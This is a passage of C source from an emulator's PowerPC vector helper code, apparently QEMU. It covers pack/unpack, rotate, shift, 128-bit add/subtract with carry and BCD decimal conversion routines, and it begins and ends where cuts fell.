b : a; \ \ VECTOR_FOR_INORDER_I(i, from) { \ result.to[i] = cvt(a0->from[i], &sat); \ result.to[i + ARRAY_SIZE(r->from)] = cvt(a1->from[i], &sat);\ } \ *r = result; \ if (dosat && sat) { \ set_vscr_sat(env); \ } \ } #define I(x, y) (x) VPK(shss, s16, s8, cvtshsb, 1) VPK(shus, s16, u8, cvtshub, 1) VPK(swss, s32, s16, cvtswsh, 1) VPK(swus, s32, u16, cvtswuh, 1) VPK(sdss, s64, s32, cvtsdsw, 1) VPK(sdus, s64, u32, cvtsduw, 1) VPK(uhus, u16, u8, cvtuhub, 1) VPK(uwus, u32, u16, cvtuwuh, 1) VPK(udus, u64, u32, cvtuduw, 1) VPK(uhum, u16, u8, I, 0) VPK(uwum, u32, u16, I, 0) VPK(udum, u64, u32, I, 0) #undef I #undef VPK #undef PKBIG void helper_vrefp(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *b) { int i; for (i = 0; i < ARRAY_SIZE(r->f32); i++) { r->f32[i] = float32_div(float32_one, b->f32[i], &env->vec_status); } } #define VRFI(suffix, rounding) \ void helper_vrfi##suffix(CPUPPCState *env, ppc_avr_t *r, \ ppc_avr_t *b) \ { \ int i; \ float_status s = env->vec_status; \ \ set_float_rounding_mode(rounding, &s); \ for (i = 0; i < ARRAY_SIZE(r->f32); i++) { \ r->f32[i] = float32_round_to_int (b->f32[i], &s); \ } \ } VRFI(n, float_round_nearest_even) VRFI(m, float_round_down) VRFI(p, float_round_up) VRFI(z, float_round_to_zero) #undef VRFI #define VROTATE(suffix, element, mask) \ void helper_vrl##suffix(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) \ { \ int i; \ \ for (i = 0; i < ARRAY_SIZE(r->element); i++) { \ unsigned int shift = b->element[i] & mask; \ r->element[i] = (a->element[i] << shift) | \ (a->element[i] >> (sizeof(a->element[0]) * 8 - shift)); \ } \ } VROTATE(b, u8, 0x7) VROTATE(h, u16, 0xF) VROTATE(w, u32, 0x1F) VROTATE(d, u64, 0x3F) #undef VROTATE void helper_vrsqrtefp(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *b) { int i; for (i = 0; i < ARRAY_SIZE(r->f32); i++) { float32 t = float32_sqrt(b->f32[i], &env->vec_status); r->f32[i] = float32_div(float32_one, t, &env->vec_status); } } #define VRLMI(name, size, element, insert) \ void helper_##name(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) \ { \ int i; \ for (i = 0; i < ARRAY_SIZE(r->element); i++) { \ uint##size##_t src1 = a->element[i]; \ uint##size##_t src2 = b->element[i]; \ uint##size##_t src3 = r->element[i]; \ uint##size##_t begin, end, shift, mask, rot_val; \ \ shift = extract##size(src2, 0, 6); \ end = extract##size(src2, 8, 6); \ begin = extract##size(src2, 16, 6); \ rot_val = rol##size(src1, shift); \ mask = mask_u##size(begin, end); \ if (insert) { \ r->element[i] = (rot_val & mask) | (src3 & ~mask); \ } else { \ r->element[i] = (rot_val & mask); \ } \ } \ } VRLMI(vrldmi, 64, u64, 1); VRLMI(vrlwmi, 32, u32, 1); VRLMI(vrldnm, 64, u64, 0); VRLMI(vrlwnm, 32, u32, 0); void helper_vsel(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { r->u64[0] = (a->u64[0] & ~c->u64[0]) | (b->u64[0] & c->u64[0]); r->u64[1] = (a->u64[1] & ~c->u64[1]) | (b->u64[1] & c->u64[1]); } void helper_vexptefp(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *b) { int i; for (i = 0; i < ARRAY_SIZE(r->f32); i++) { r->f32[i] = float32_exp2(b->f32[i], &env->vec_status); } } void helper_vlogefp(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *b) { int i; for (i = 0; i < ARRAY_SIZE(r->f32); i++) { r->f32[i] = float32_log2(b->f32[i], &env->vec_status); } } #if defined(HOST_WORDS_BIGENDIAN) #define VEXTU_X_DO(name, size, left) \ target_ulong glue(helper_, name)(target_ulong a, ppc_avr_t *b) \ { \ int index; \ if (left) { \ index = (a & 0xf) * 8; \ } else { \ index = ((15 - (a & 0xf) + 1) * 8) - size; \ } \ return int128_getlo(int128_rshift(b->s128, index)) & \ 
MAKE_64BIT_MASK(0, size); \ } #else #define VEXTU_X_DO(name, size, left) \ target_ulong glue(helper_, name)(target_ulong a, ppc_avr_t *b) \ { \ int index; \ if (left) { \ index = ((15 - (a & 0xf) + 1) * 8) - size; \ } else { \ index = (a & 0xf) * 8; \ } \ return int128_getlo(int128_rshift(b->s128, index)) & \ MAKE_64BIT_MASK(0, size); \ } #endif VEXTU_X_DO(vextublx, 8, 1) VEXTU_X_DO(vextuhlx, 16, 1) VEXTU_X_DO(vextuwlx, 32, 1) VEXTU_X_DO(vextubrx, 8, 0) VEXTU_X_DO(vextuhrx, 16, 0) VEXTU_X_DO(vextuwrx, 32, 0) #undef VEXTU_X_DO void helper_vslv(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { int i; unsigned int shift, bytes, size; size = ARRAY_SIZE(r->u8); for (i = 0; i < size; i++) { shift = b->VsrB(i) & 0x7; /* extract shift value */ bytes = (a->VsrB(i) << 8) + /* extract adjacent bytes */ (((i + 1) < size) ? a->VsrB(i + 1) : 0); r->VsrB(i) = (bytes << shift) >> 8; /* shift and store result */ } } void helper_vsrv(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { int i; unsigned int shift, bytes; /* * Use reverse order, as destination and source register can be * same. Its being modified in place saving temporary, reverse * order will guarantee that computed result is not fed back. */ for (i = ARRAY_SIZE(r->u8) - 1; i >= 0; i--) { shift = b->VsrB(i) & 0x7; /* extract shift value */ bytes = ((i ? a->VsrB(i - 1) : 0) << 8) + a->VsrB(i); /* extract adjacent bytes */ r->VsrB(i) = (bytes >> shift) & 0xFF; /* shift and store result */ } } void helper_vsldoi(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, uint32_t shift) { int sh = shift & 0xf; int i; ppc_avr_t result; for (i = 0; i < ARRAY_SIZE(r->u8); i++) { int index = sh + i; if (index > 0xf) { result.VsrB(i) = b->VsrB(index - 0x10); } else { result.VsrB(i) = a->VsrB(index); } } *r = result; } void helper_vslo(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { int sh = (b->VsrB(0xf) >> 3) & 0xf; #if defined(HOST_WORDS_BIGENDIAN) memmove(&r->u8[0], &a->u8[sh], 16 - sh); memset(&r->u8[16 - sh], 0, sh); #else memmove(&r->u8[sh], &a->u8[0], 16 - sh); memset(&r->u8[0], 0, sh); #endif } #if defined(HOST_WORDS_BIGENDIAN) #define VINSERT(suffix, element) \ void helper_vinsert##suffix(ppc_avr_t *r, ppc_avr_t *b, uint32_t index) \ { \ memmove(&r->u8[index], &b->u8[8 - sizeof(r->element[0])], \ sizeof(r->element[0])); \ } #else #define VINSERT(suffix, element) \ void helper_vinsert##suffix(ppc_avr_t *r, ppc_avr_t *b, uint32_t index) \ { \ uint32_t d = (16 - index) - sizeof(r->element[0]); \ memmove(&r->u8[d], &b->u8[8], sizeof(r->element[0])); \ } #endif VINSERT(b, u8) VINSERT(h, u16) VINSERT(w, u32) VINSERT(d, u64) #undef VINSERT #if defined(HOST_WORDS_BIGENDIAN) #define VEXTRACT(suffix, element) \ void helper_vextract##suffix(ppc_avr_t *r, ppc_avr_t *b, uint32_t index) \ { \ uint32_t es = sizeof(r->element[0]); \ memmove(&r->u8[8 - es], &b->u8[index], es); \ memset(&r->u8[8], 0, 8); \ memset(&r->u8[0], 0, 8 - es); \ } #else #define VEXTRACT(suffix, element) \ void helper_vextract##suffix(ppc_avr_t *r, ppc_avr_t *b, uint32_t index) \ { \ uint32_t es = sizeof(r->element[0]); \ uint32_t s = (16 - index) - es; \ memmove(&r->u8[8], &b->u8[s], es); \ memset(&r->u8[0], 0, 8); \ memset(&r->u8[8 + es], 0, 8 - es); \ } #endif VEXTRACT(ub, u8) VEXTRACT(uh, u16) VEXTRACT(uw, u32) VEXTRACT(d, u64) #undef VEXTRACT void helper_xxextractuw(CPUPPCState *env, ppc_vsr_t *xt, ppc_vsr_t *xb, uint32_t index) { ppc_vsr_t t = { 0 }; size_t es = sizeof(uint32_t); uint32_t ext_index; int i; ext_index = index; for (i = 0; i < es; i++, ext_index++) { t.VsrB(8 - es + i) = xb->VsrB(ext_index % 16); } 
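    /*
     * Added note (not in the original source): the loop above copies the
     * four bytes of xb starting at byte offset 'index' (wrapping modulo
     * 16, big-endian element order) into bytes 4..7 of the otherwise
     * zeroed target, i.e. the low word of the high doubleword.
     */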
*xt = t; } void helper_xxinsertw(CPUPPCState *env, ppc_vsr_t *xt, ppc_vsr_t *xb, uint32_t index) { ppc_vsr_t t = *xt; size_t es = sizeof(uint32_t); int ins_index, i = 0; ins_index = index; for (i = 0; i < es && ins_index < 16; i++, ins_index++) { t.VsrB(ins_index) = xb->VsrB(8 - es + i); } *xt = t; } #define VEXT_SIGNED(name, element, cast) \ void helper_##name(ppc_avr_t *r, ppc_avr_t *b) \ { \ int i; \ for (i = 0; i < ARRAY_SIZE(r->element); i++) { \ r->element[i] = (cast)b->element[i]; \ } \ } VEXT_SIGNED(vextsb2w, s32, int8_t) VEXT_SIGNED(vextsb2d, s64, int8_t) VEXT_SIGNED(vextsh2w, s32, int16_t) VEXT_SIGNED(vextsh2d, s64, int16_t) VEXT_SIGNED(vextsw2d, s64, int32_t) #undef VEXT_SIGNED #define VNEG(name, element) \ void helper_##name(ppc_avr_t *r, ppc_avr_t *b) \ { \ int i; \ for (i = 0; i < ARRAY_SIZE(r->element); i++) { \ r->element[i] = -b->element[i]; \ } \ } VNEG(vnegw, s32) VNEG(vnegd, s64) #undef VNEG void helper_vsro(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { int sh = (b->VsrB(0xf) >> 3) & 0xf; #if defined(HOST_WORDS_BIGENDIAN) memmove(&r->u8[sh], &a->u8[0], 16 - sh); memset(&r->u8[0], 0, sh); #else memmove(&r->u8[0], &a->u8[sh], 16 - sh); memset(&r->u8[16 - sh], 0, sh); #endif } void helper_vsubcuw(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { int i; for (i = 0; i < ARRAY_SIZE(r->u32); i++) { r->u32[i] = a->u32[i] >= b->u32[i]; } } void helper_vsumsws(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { int64_t t; int i, upper; ppc_avr_t result; int sat = 0; upper = ARRAY_SIZE(r->s32) - 1; t = (int64_t)b->VsrSW(upper); for (i = 0; i < ARRAY_SIZE(r->s32); i++) { t += a->VsrSW(i); result.VsrSW(i) = 0; } result.VsrSW(upper) = cvtsdsw(t, &sat); *r = result; if (sat) { set_vscr_sat(env); } } void helper_vsum2sws(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { int i, j, upper; ppc_avr_t result; int sat = 0; upper = 1; for (i = 0; i < ARRAY_SIZE(r->u64); i++) { int64_t t = (int64_t)b->VsrSW(upper + i * 2); result.VsrD(i) = 0; for (j = 0; j < ARRAY_SIZE(r->u64); j++) { t += a->VsrSW(2 * i + j); } result.VsrSW(upper + i * 2) = cvtsdsw(t, &sat); } *r = result; if (sat) { set_vscr_sat(env); } } void helper_vsum4sbs(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { int i, j; int sat = 0; for (i = 0; i < ARRAY_SIZE(r->s32); i++) { int64_t t = (int64_t)b->s32[i]; for (j = 0; j < ARRAY_SIZE(r->s32); j++) { t += a->s8[4 * i + j]; } r->s32[i] = cvtsdsw(t, &sat); } if (sat) { set_vscr_sat(env); } } void helper_vsum4shs(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { int sat = 0; int i; for (i = 0; i < ARRAY_SIZE(r->s32); i++) { int64_t t = (int64_t)b->s32[i]; t += a->s16[2 * i] + a->s16[2 * i + 1]; r->s32[i] = cvtsdsw(t, &sat); } if (sat) { set_vscr_sat(env); } } void helper_vsum4ubs(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { int i, j; int sat = 0; for (i = 0; i < ARRAY_SIZE(r->u32); i++) { uint64_t t = (uint64_t)b->u32[i]; for (j = 0; j < ARRAY_SIZE(r->u32); j++) { t += a->u8[4 * i + j]; } r->u32[i] = cvtuduw(t, &sat); } if (sat) { set_vscr_sat(env); } } #if defined(HOST_WORDS_BIGENDIAN) #define UPKHI 1 #define UPKLO 0 #else #define UPKHI 0 #define UPKLO 1 #endif #define VUPKPX(suffix, hi) \ void helper_vupk##suffix(ppc_avr_t *r, ppc_avr_t *b) \ { \ int i; \ ppc_avr_t result; \ \ for (i = 0; i < ARRAY_SIZE(r->u32); i++) { \ uint16_t e = b->u16[hi ? i : i + 4]; \ uint8_t a = (e >> 15) ? 
0xff : 0; \ uint8_t r = (e >> 10) & 0x1f; \ uint8_t g = (e >> 5) & 0x1f; \ uint8_t b = e & 0x1f; \ \ result.u32[i] = (a << 24) | (r << 16) | (g << 8) | b; \ } \ *r = result; \ } VUPKPX(lpx, UPKLO) VUPKPX(hpx, UPKHI) #undef VUPKPX #define VUPK(suffix, unpacked, packee, hi) \ void helper_vupk##suffix(ppc_avr_t *r, ppc_avr_t *b) \ { \ int i; \ ppc_avr_t result; \ \ if (hi) { \ for (i = 0; i < ARRAY_SIZE(r->unpacked); i++) { \ result.unpacked[i] = b->packee[i]; \ } \ } else { \ for (i = ARRAY_SIZE(r->unpacked); i < ARRAY_SIZE(r->packee); \ i++) { \ result.unpacked[i - ARRAY_SIZE(r->unpacked)] = b->packee[i]; \ } \ } \ *r = result; \ } VUPK(hsb, s16, s8, UPKHI) VUPK(hsh, s32, s16, UPKHI) VUPK(hsw, s64, s32, UPKHI) VUPK(lsb, s16, s8, UPKLO) VUPK(lsh, s32, s16, UPKLO) VUPK(lsw, s64, s32, UPKLO) #undef VUPK #undef UPKHI #undef UPKLO #define VGENERIC_DO(name, element) \ void helper_v##name(ppc_avr_t *r, ppc_avr_t *b) \ { \ int i; \ \ for (i = 0; i < ARRAY_SIZE(r->element); i++) { \ r->element[i] = name(b->element[i]); \ } \ } #define clzb(v) ((v) ? clz32((uint32_t)(v) << 24) : 8) #define clzh(v) ((v) ? clz32((uint32_t)(v) << 16) : 16) VGENERIC_DO(clzb, u8) VGENERIC_DO(clzh, u16) #undef clzb #undef clzh #define ctzb(v) ((v) ? ctz32(v) : 8) #define ctzh(v) ((v) ? ctz32(v) : 16) #define ctzw(v) ctz32((v)) #define ctzd(v) ctz64((v)) VGENERIC_DO(ctzb, u8) VGENERIC_DO(ctzh, u16) VGENERIC_DO(ctzw, u32) VGENERIC_DO(ctzd, u64) #undef ctzb #undef ctzh #undef ctzw #undef ctzd #define popcntb(v) ctpop8(v) #define popcnth(v) ctpop16(v) #define popcntw(v) ctpop32(v) #define popcntd(v) ctpop64(v) VGENERIC_DO(popcntb, u8) VGENERIC_DO(popcnth, u16) VGENERIC_DO(popcntw, u32) VGENERIC_DO(popcntd, u64) #undef popcntb #undef popcnth #undef popcntw #undef popcntd #undef VGENERIC_DO #if defined(HOST_WORDS_BIGENDIAN) #define QW_ONE { .u64 = { 0, 1 } } #else #define QW_ONE { .u64 = { 1, 0 } } #endif #ifndef CONFIG_INT128 static inline void avr_qw_not(ppc_avr_t *t, ppc_avr_t a) { t->u64[0] = ~a.u64[0]; t->u64[1] = ~a.u64[1]; } static int avr_qw_cmpu(ppc_avr_t a, ppc_avr_t b) { if (a.VsrD(0) < b.VsrD(0)) { return -1; } else if (a.VsrD(0) > b.VsrD(0)) { return 1; } else if (a.VsrD(1) < b.VsrD(1)) { return -1; } else if (a.VsrD(1) > b.VsrD(1)) { return 1; } else { return 0; } } static void avr_qw_add(ppc_avr_t *t, ppc_avr_t a, ppc_avr_t b) { t->VsrD(1) = a.VsrD(1) + b.VsrD(1); t->VsrD(0) = a.VsrD(0) + b.VsrD(0) + (~a.VsrD(1) < b.VsrD(1)); } static int avr_qw_addc(ppc_avr_t *t, ppc_avr_t a, ppc_avr_t b) { ppc_avr_t not_a; t->VsrD(1) = a.VsrD(1) + b.VsrD(1); t->VsrD(0) = a.VsrD(0) + b.VsrD(0) + (~a.VsrD(1) < b.VsrD(1)); avr_qw_not(¬_a, a); return avr_qw_cmpu(not_a, b) < 0; } #endif void helper_vadduqm(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { #ifdef CONFIG_INT128 r->u128 = a->u128 + b->u128; #else avr_qw_add(r, *a, *b); #endif } void helper_vaddeuqm(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { #ifdef CONFIG_INT128 r->u128 = a->u128 + b->u128 + (c->u128 & 1); #else if (c->VsrD(1) & 1) { ppc_avr_t tmp; tmp.VsrD(0) = 0; tmp.VsrD(1) = c->VsrD(1) & 1; avr_qw_add(&tmp, *a, tmp); avr_qw_add(r, tmp, *b); } else { avr_qw_add(r, *a, *b); } #endif } void helper_vaddcuq(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { #ifdef CONFIG_INT128 r->u128 = (~a->u128 < b->u128); #else ppc_avr_t not_a; avr_qw_not(¬_a, *a); r->VsrD(0) = 0; r->VsrD(1) = (avr_qw_cmpu(not_a, *b) < 0); #endif } void helper_vaddecuq(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { #ifdef CONFIG_INT128 int carry_out = (~a->u128 < b->u128); if (!carry_out 
&& (c->u128 & 1)) { carry_out = ((a->u128 + b->u128 + 1) == 0) && ((a->u128 != 0) || (b->u128 != 0)); } r->u128 = carry_out; #else int carry_in = c->VsrD(1) & 1; int carry_out = 0; ppc_avr_t tmp; carry_out = avr_qw_addc(&tmp, *a, *b); if (!carry_out && carry_in) { ppc_avr_t one = QW_ONE; carry_out = avr_qw_addc(&tmp, tmp, one); } r->VsrD(0) = 0; r->VsrD(1) = carry_out; #endif } void helper_vsubuqm(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { #ifdef CONFIG_INT128 r->u128 = a->u128 - b->u128; #else ppc_avr_t tmp; ppc_avr_t one = QW_ONE; avr_qw_not(&tmp, *b); avr_qw_add(&tmp, *a, tmp); avr_qw_add(r, tmp, one); #endif } void helper_vsubeuqm(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { #ifdef CONFIG_INT128 r->u128 = a->u128 + ~b->u128 + (c->u128 & 1); #else ppc_avr_t tmp, sum; avr_qw_not(&tmp, *b); avr_qw_add(&sum, *a, tmp); tmp.VsrD(0) = 0; tmp.VsrD(1) = c->VsrD(1) & 1; avr_qw_add(r, sum, tmp); #endif } void helper_vsubcuq(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { #ifdef CONFIG_INT128 r->u128 = (~a->u128 < ~b->u128) || (a->u128 + ~b->u128 == (__uint128_t)-1); #else int carry = (avr_qw_cmpu(*a, *b) > 0); if (!carry) { ppc_avr_t tmp; avr_qw_not(&tmp, *b); avr_qw_add(&tmp, *a, tmp); #ifdef _MSC_VER carry = ((tmp.VsrSD(0) == (0ULL - 1ULL)) && (tmp.VsrSD(1) == (0ULL - 1ULL))); #else carry = ((tmp.VsrSD(0) == -1ull) && (tmp.VsrSD(1) == -1ull)); #endif } r->VsrD(0) = 0; r->VsrD(1) = carry; #endif } void helper_vsubecuq(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { #ifdef CONFIG_INT128 r->u128 = (~a->u128 < ~b->u128) || ((c->u128 & 1) && (a->u128 + ~b->u128 == (__uint128_t)-1)); #else int carry_in = c->VsrD(1) & 1; int carry_out = (avr_qw_cmpu(*a, *b) > 0); if (!carry_out && carry_in) { ppc_avr_t tmp; avr_qw_not(&tmp, *b); avr_qw_add(&tmp, *a, tmp); #ifdef _MSC_VER carry_out = ((tmp.VsrD(0) == (0ULL - 1ULL)) && (tmp.VsrD(1) == (0ULL - 1ULL))); #else carry_out = ((tmp.VsrD(0) == -1ull) && (tmp.VsrD(1) == -1ull)); #endif } r->VsrD(0) = 0; r->VsrD(1) = carry_out; #endif } #define BCD_PLUS_PREF_1 0xC #define BCD_PLUS_PREF_2 0xF #define BCD_PLUS_ALT_1 0xA #define BCD_NEG_PREF 0xD #define BCD_NEG_ALT 0xB #define BCD_PLUS_ALT_2 0xE #define NATIONAL_PLUS 0x2B #define NATIONAL_NEG 0x2D #define BCD_DIG_BYTE(n) (15 - ((n) / 2)) static int bcd_get_sgn(ppc_avr_t *bcd) { switch (bcd->VsrB(BCD_DIG_BYTE(0)) & 0xF) { case BCD_PLUS_PREF_1: case BCD_PLUS_PREF_2: case BCD_PLUS_ALT_1: case BCD_PLUS_ALT_2: { return 1; } case BCD_NEG_PREF: case BCD_NEG_ALT: { return -1; } default: { return 0; } } } static int bcd_preferred_sgn(int sgn, int ps) { if (sgn >= 0) { return (ps == 0) ? 
BCD_PLUS_PREF_1 : BCD_PLUS_PREF_2; } else { return BCD_NEG_PREF; } } static uint8_t bcd_get_digit(ppc_avr_t *bcd, int n, int *invalid) { uint8_t result; if (n & 1) { result = bcd->VsrB(BCD_DIG_BYTE(n)) >> 4; } else { result = bcd->VsrB(BCD_DIG_BYTE(n)) & 0xF; } if (unlikely(result > 9)) { *invalid = true; } return result; } static void bcd_put_digit(ppc_avr_t *bcd, uint8_t digit, int n) { if (n & 1) { bcd->VsrB(BCD_DIG_BYTE(n)) &= 0x0F; bcd->VsrB(BCD_DIG_BYTE(n)) |= (digit << 4); } else { bcd->VsrB(BCD_DIG_BYTE(n)) &= 0xF0; bcd->VsrB(BCD_DIG_BYTE(n)) |= digit; } } static bool bcd_is_valid(ppc_avr_t *bcd) { int i; int invalid = 0; if (bcd_get_sgn(bcd) == 0) { return false; } for (i = 1; i < 32; i++) { bcd_get_digit(bcd, i, &invalid); if (unlikely(invalid)) { return false; } } return true; } static int bcd_cmp_zero(ppc_avr_t *bcd) { if (bcd->VsrD(0) == 0 && (bcd->VsrD(1) >> 4) == 0) { return CRF_EQ; } else { return (bcd_get_sgn(bcd) == 1) ? CRF_GT : CRF_LT; } } static uint16_t get_national_digit(ppc_avr_t *reg, int n) { return reg->VsrH(7 - n); } static void set_national_digit(ppc_avr_t *reg, uint8_t val, int n) { reg->VsrH(7 - n) = val; } static int bcd_cmp_mag(ppc_avr_t *a, ppc_avr_t *b) { int i; int invalid = 0; for (i = 31; i > 0; i--) { uint8_t dig_a = bcd_get_digit(a, i, &invalid); uint8_t dig_b = bcd_get_digit(b, i, &invalid); if (unlikely(invalid)) { return 0; /* doesn't matter */ } else if (dig_a > dig_b) { return 1; } else if (dig_a < dig_b) { return -1; } } return 0; } static void bcd_add_mag(ppc_avr_t *t, ppc_avr_t *a, ppc_avr_t *b, int *invalid, int *overflow) { int carry = 0; int i; for (i = 1; i <= 31; i++) { uint8_t digit = bcd_get_digit(a, i, invalid) + bcd_get_digit(b, i, invalid) + carry; if (digit > 9) { carry = 1; digit -= 10; } else { carry = 0; } bcd_put_digit(t, digit, i); } *overflow = carry; } static void bcd_sub_mag(ppc_avr_t *t, ppc_avr_t *a, ppc_avr_t *b, int *invalid, int *overflow) { int carry = 0; int i; for (i = 1; i <= 31; i++) { uint8_t digit = bcd_get_digit(a, i, invalid) - bcd_get_digit(b, i, invalid) + carry; if (digit & 0x80) { carry = -1; digit += 10; } else { carry = 0; } bcd_put_digit(t, digit, i); } *overflow = carry; } uint32_t helper_bcdadd(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, uint32_t ps) { int sgna = bcd_get_sgn(a); int sgnb = bcd_get_sgn(b); int invalid = (sgna == 0) || (sgnb == 0); int overflow = 0; uint32_t cr = 0; ppc_avr_t result = { .u64 = { 0, 0 } }; if (!invalid) { if (sgna == sgnb) { result.VsrB(BCD_DIG_BYTE(0)) = bcd_preferred_sgn(sgna, ps); bcd_add_mag(&result, a, b, &invalid, &overflow); cr = bcd_cmp_zero(&result); } else { int magnitude = bcd_cmp_mag(a, b); if (magnitude > 0) { result.VsrB(BCD_DIG_BYTE(0)) = bcd_preferred_sgn(sgna, ps); bcd_sub_mag(&result, a, b, &invalid, &overflow); cr = (sgna > 0) ? CRF_GT : CRF_LT; } else if (magnitude < 0) { result.VsrB(BCD_DIG_BYTE(0)) = bcd_preferred_sgn(sgnb, ps); bcd_sub_mag(&result, b, a, &invalid, &overflow); cr = (sgnb > 0) ? CRF_GT : CRF_LT; } else { result.VsrB(BCD_DIG_BYTE(0)) = bcd_preferred_sgn(0, ps); cr = CRF_EQ; } } } if (unlikely(invalid)) { result.VsrD(0) = result.VsrD(1) = -1; cr = CRF_SO; } else if (overflow) { cr |= CRF_SO; } *r = result; return cr; } uint32_t helper_bcdsub(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, uint32_t ps) { ppc_avr_t bcopy = *b; int sgnb = bcd_get_sgn(b); if (sgnb < 0) { bcd_put_digit(&bcopy, BCD_PLUS_PREF_1, 0); } else if (sgnb > 0) { bcd_put_digit(&bcopy, BCD_NEG_PREF, 0); } /* else invalid ... 
defer to bcdadd code for proper handling */ return helper_bcdadd(r, a, &bcopy, ps); } uint32_t helper_bcdcfn(ppc_avr_t *r, ppc_avr_t *b, uint32_t ps) { int i; int cr = 0; uint16_t national = 0; uint16_t sgnb = get_national_digit(b, 0); ppc_avr_t ret = { .u64 = { 0, 0 } }; int invalid = (sgnb != NATIONAL_PLUS && sgnb != NATIONAL_NEG); for (i = 1; i < 8; i++) { national = get_national_digit(b, i); if (unlikely(national < 0x30 || national > 0x39)) { invalid = 1; break; } bcd_put_digit(&ret, national & 0xf, i); } if (sgnb == NATIONAL_PLUS) { bcd_put_digit(&ret, (ps == 0) ? BCD_PLUS_PREF_1 : BCD_PLUS_PREF_2, 0); } else { bcd_put_digit(&ret, BCD_NEG_PREF, 0); } cr = bcd_cmp_zero(&ret); if (unlikely(invalid)) { cr = CRF_SO; } *r = ret; return cr; } uint32_t helper_bcdctn(ppc_avr_t *r, ppc_avr_t *b, uint32_t ps) { int i; int cr = 0; int sgnb = bcd_get_sgn(b); int invalid = (sgnb == 0); ppc_avr_t ret = { .u64 = { 0, 0 } }; int ox_flag = (b->VsrD(0) != 0) || ((b->VsrD(1) >> 32) != 0); for (i = 1; i < 8; i++) { set_national_digit(&ret, 0x30 + bcd_get_digit(b, i, &invalid), i); if (unlikely(invalid)) { break; } } set_national_digit(&ret, (sgnb == -1) ? NATIONAL_NEG : NATIONAL_PLUS, 0); cr = bcd_cmp_zero(b); if (ox_flag) { cr |= CRF_SO; } if (unlikely(invalid)) { cr = CRF_SO; } *r = ret; return cr; } uint32_t helper_bcdcfz(ppc_avr_t *r, ppc_avr_t *b, uint32_t ps) { int i; int cr = 0; int invalid = 0; int zone_digit = 0; int zone_lead = ps ? 0xF : 0x3; int digit = 0; ppc_avr_t ret = { .u64 = { 0, 0 } }; int sgnb = b->VsrB(BCD_DIG_BYTE(0)) >> 4; if (unlikely((sgnb < 0xA) && ps)) { invalid = 1; } for (i = 0; i < 16; i++) { zone_digit = i ? b->VsrB(BCD_DIG_BYTE(i * 2)) >> 4 : zone_lead; digit = b->VsrB(BCD_DIG_BYTE(i * 2)) & 0xF; if (unlikely(zone_digit != zone_lead || digit > 0x9)) { invalid = 1; break; } bcd_put_digit(&ret, digit, i + 1); } if ((ps && (sgnb == 0xB || sgnb == 0xD)) || (!ps && (sgnb & 0x4))) { bcd_put_digit(&ret, BCD_NEG_PREF, 0); } else { bcd_put_digit(&ret, BCD_PLUS_PREF_1, 0); } cr = bcd_cmp_zero(&ret); if (unlikely(invalid)) { cr = CRF_SO; } *r = ret; return cr; } uint32_t helper_bcdctz(ppc_avr_t *r, ppc_avr_t *b, uint32_t ps) { int i; int cr = 0; uint8_t digit = 0; int sgnb = bcd_get_sgn(b); int zone_lead = (ps) ? 0xF0 : 0x30; int invalid = (sgnb == 0); ppc_avr_t ret = { .u64 = { 0, 0 } }; int ox_flag = ((b->VsrD(0) >> 4) != 0); for (i = 0; i < 16; i++) { digit = bcd_get_digit(b, i + 1, &invalid); if (unlikely(invalid)) { break; } ret.VsrB(BCD_DIG_BYTE(i * 2)) = zone_lead + digit; } if (ps) { bcd_put_digit(&ret, (sgnb == 1) ? 0xC : 0xD, 1); } else { bcd_put_digit(&ret, (sgnb == 1) ? 
0x3 : 0x7, 1); } cr = bcd_cmp_zero(b); if (ox_flag) { cr |= CRF_SO; } if (unlikely(invalid)) { cr = CRF_SO; } *r = ret; return cr; } uint32_t helper_bcdcfsq(ppc_avr_t *r, ppc_avr_t *b, uint32_t ps) { int i; int cr = 0; uint64_t lo_value; uint64_t hi_value; ppc_avr_t ret = { .u64 = { 0, 0 } }; if (b->VsrSD(0) < 0) { lo_value = -b->VsrSD(1); hi_value = ~b->VsrD(0) + !lo_value; bcd_put_digit(&ret, 0xD, 0); } else { lo_value = b->VsrD(1); hi_value = b->VsrD(0); bcd_put_digit(&ret, bcd_preferred_sgn(0, ps), 0); } if (divu128(&lo_value, &hi_value, 1000000000000000ULL) || lo_value > 9999999999999999ULL) { cr = CRF_SO; } for (i = 1; i < 16; hi_value /= 10, i++) { bcd_put_digit(&ret, hi_value % 10, i); } for (; i < 32; lo_value /= 10, i++) { bcd_put_digit(&ret, lo_value % 10, i); } cr |= bcd_cmp_zero(&ret); *r = ret; return cr; } uint32_t helper_bcdctsq(ppc_avr_t *r, ppc_avr_t *b, uint32_t ps) { uint8_t i; int cr; uint64_t carry; uint64_t unused; uint64_t lo_value; uint64_t hi_value = 0; int sgnb = 